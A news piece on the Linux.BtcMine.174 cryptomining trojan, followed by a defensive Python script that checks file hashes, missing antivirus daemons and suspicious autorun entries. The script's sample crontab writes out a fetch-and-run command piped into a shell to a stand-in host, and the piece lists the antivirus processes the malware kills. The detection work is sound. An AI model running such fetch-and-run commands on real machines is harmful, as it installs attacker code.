LINUX MAY FALL some way behind Windows in virus distributors’ eyes thanks to its smaller install base, but Linux-focused malware does exist, and it often takes advantage of the complacency that relative rarity brings. Even if you do run some kind of anti-malware software on your Linux box, you’re still at risk from this particularly jerky piece of malware, recently identified by Russian security firm Dr.Web.
Comprising more than 1,000 lines of shell script, Linux.BtcMine.174 (the company is better at identifying malware than giving it a headline-friendly name) is particularly malicious thanks to the number of ways it attacks its host.
As the name suggests, the main function of the malware is to mine cryptocurrency, in this case Monero, but before it gets to that point it has some fun with its Linux host. At the start of the infection it looks for a directory it has write permission to, so it can copy itself there and download additional modules.
It then tries a couple of privilege escalation exploits, including Dirty Cow (CVE-2016-5195, and now that’s how you name an exploit!), to obtain root and with it full control of the OS. It sets itself up as a local daemon, installs the nohup utility if it isn’t already present, and downloads and runs a DDoS trojan known as Bill Gates for good measure.
As it embarks on its main task of mining Monero, Linux.BtcMine.174 is keen to ensure it takes up as much system resource as it possibly can. Not only does it scan and terminate rival cryptocurrency-mining programmes, but it disables any Linux-based antivirus system it recognises along the way, taking down processes named safedog, aegis, yunsuo, clamd, avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets and xmirrord.
But wait, there’s more! The trojan then adds itself to various autorun entries and downloads and runs a rootkit. That rootkit can grab passwords as they’re typed into the su command and hide files from the system’s owner.
The trojan also tries to colonise remote servers the infected host has previously connected to over SSH, to spread the mayhem further. Dr.Web has published the SHA1 file hashes for Linux.BtcMine.174 on GitHub if you want to check your system for its footprints.
Source: Inquirer
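The three behaviours above (the kill-list of protective daemons, the autorun persistence, and the published SHA1 hashes) each give a defender something concrete to check for. The script below is an added example written for this page; it is not Dr.Web's tooling, the published IOC list, or any of the trojan's own code. The daemon names are the ones the article lists; the autorun locations, the fetch-and-run regex, the sample crontab and the hash list in `demo()` are assumptions and constructed sample data, so a real hunt would swap in the hashes from Dr.Web's GitHub repository.

```python
#!/usr/bin/env python3
"""Triage helpers for Linux.BtcMine.174-style miners (example code, not Dr.Web's)."""
import hashlib
import os
import re
import tempfile

# Protective daemons the article says the trojan terminates. A daemon that
# is expected on this host but no longer running is a lead worth chasing.
GUARD_PROCESSES = {"safedog", "aegis", "yunsuo", "clamd", "avast", "avgd",
                   "cmdavd", "cmdmgd", "drweb-configd", "drweb-spider-kmod",
                   "esets", "xmirrord"}

# Assumption: the article only says "various files"; these are the usual
# persistence points on a Linux box and are the ones inspected by default.
AUTORUN_FILES = ["/etc/rc.local", "/etc/crontab", "/etc/profile", "/root/.bashrc"]

# Heuristic (assumption): a detached nohup launch, a download piped straight
# into a shell, or anything executed out of /tmp inside an autorun entry.
SUSPICIOUS = re.compile(r"\bnohup\b|(curl|wget)\b.*\|\s*(ba)?sh\b|/tmp/\S+")


def sha1_of(path, chunk=1 << 16):
    """Stream a file through SHA1 so large binaries do not need to fit in RAM."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def match_hashes(paths, bad_hashes):
    """Return {path: sha1} for readable files whose SHA1 is in bad_hashes."""
    bad = {x.strip().lower() for x in bad_hashes if x.strip()}
    hits = {}
    for p in paths:
        try:
            digest = sha1_of(p)
        except OSError:          # missing or unreadable: skip, do not abort the hunt
            continue
        if digest in bad:
            hits[p] = digest
    return hits


def running_comms(proc_root="/proc"):
    """Names of running processes from /proc/<pid>/comm (what a kill-by-name sees)."""
    names = set()
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, pid, "comm")) as f:
                names.add(f.read().strip())
        except OSError:          # process exited between listdir and open
            continue
    return names


def missing_guards(expected, running):
    """Protective daemons this host should be running that are absent."""
    return sorted((set(expected) & GUARD_PROCESSES) - set(running))


def suspicious_autorun_lines(files):
    """(path, line number, text) for non-comment autorun lines matching SUSPICIOUS."""
    hits = []
    for path in files:
        try:
            with open(path, errors="replace") as f:
                for n, line in enumerate(f, 1):
                    s = line.strip()
                    if s and not s.startswith("#") and SUSPICIOUS.search(s):
                        hits.append((path, n, s))
        except OSError:
            continue
    return hits


def demo():
    """Run every check against constructed sample data (not real IOCs)."""
    d = tempfile.mkdtemp()
    sample = os.path.join(d, "sample.bin")
    with open(sample, "wb") as f:
        f.write(b"hello")        # SHA1 aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
    cron = os.path.join(d, "crontab")
    with open(cron, "w") as f:   # constructed crontab mirroring the fetch-and-run behaviour
        f.write("# constructed sample\n"
                "0 3 * * * root /usr/bin/apt-get update\n"
                "*/5 * * * * root wget -qO- http://example.invalid/a | sh\n"
                "@reboot root nohup sh /tmp/.x/update.sh >/dev/null 2>&1 &\n")
    constructed_hashes = ["AAF4C61DDCC5E8A2DABEDE0F3B482CD9AEA9434D"]  # not Dr.Web's list
    return {
        "hash_hits": match_hashes([sample, os.path.join(d, "absent")], constructed_hashes),
        "autorun_hits": [(n, s) for _, n, s in suspicious_autorun_lines([cron])],
        "missing_guards": missing_guards(["clamd", "drweb-configd", "sshd"],
                                         {"sshd", "drweb-configd", "cron"}),
    }


if __name__ == "__main__":
    print("sample run:", demo())
    print("live autorun hits:", suspicious_autorun_lines(AUTORUN_FILES))
    print("guards missing on this host:", missing_guards(GUARD_PROCESSES, running_comms()))
```

`missing_guards()` takes the list of daemons you expect on a given host rather than the whole kill-list, since an absent `safedog` on a box that never had it is noise; the `/proc/<pid>/comm` read matches what a kill-by-name loop would see, so a renamed daemon would evade both the trojan and this check.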